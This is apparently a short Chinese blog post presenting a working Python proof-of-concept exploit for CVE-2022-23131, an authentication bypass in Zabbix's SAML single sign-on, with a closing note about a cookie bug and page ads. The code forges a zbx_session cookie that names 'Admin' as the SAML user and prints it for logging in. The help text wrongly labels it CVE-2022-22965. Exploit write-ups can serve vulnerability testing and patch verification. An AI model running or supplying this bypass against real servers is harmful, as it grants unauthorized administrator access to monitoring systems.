Poc_CVE-2022-23131
1 import requests 2 import re 3 import argparse 4 import base64,urllib.parse 5 import json 6 7 def decode(para): 8 para = urllib.parse.unquote(para,encoding="utf-8") 9 base64_decode = base64.b64decode(para) 10 para_json = json.loads(base64_decode) 11 return para_json 12 13 def verify(url,payload): 14 url = url+'/index_sso.php?form=default' 15 cookie = payload 16 payload = {'zbx_session':payload} 17 res = requests.get(url=url,cookies=payload,verify=False) 18 re = 'icon-monitoring' 19 flag = re in str(res.text) 20 21 if flag: 22 print("It looks likely vulnerable") 23 print("And please use this cookie "+ '{\33[91m'+ cookie + '\33[0m}' +" to login zabbix~") 24 else: 25 print("It is strong") 26 27 def exploit(url): 28 url = 'http://'+url+'/zabbix' 29 response = requests.get(url=url,verify=False) 30 cookie = response.headers.get('Set-Cookie') 31 para1 = re.compile('zbx_session=(.*?);') 32 para2 = re.findall(para1,cookie)[0] 33 para = decode(para2) 34 payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":'+'"'+para['sessionid']+'"'+',"sign":'+'"'+para['sign']+'"'+'}' 35 payload_encode = urllib.parse.quote(base64.b64encode(payload.encode())) 36 verify(url,payload_encode) 37 38 if __name__ == '__main__': 39 parameter = argparse.ArgumentParser(description='Poc CVE-2022-22965:') 40 parameter.add_argument('-file',help='url file',required=False) 41 parameter.add_argument('-url',help='ip:port',required=False) 42 para = parameter.parse_args() 43 44 if para.url: 45 exploit(para.url) 46 exit() 47 else: 48 parameter.print_help()
之前直接使用cookie使用习惯了,忘记了这里cookie应该是dict类型……痛心疾首写在这里,警示一下粗心的chou毛病~
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?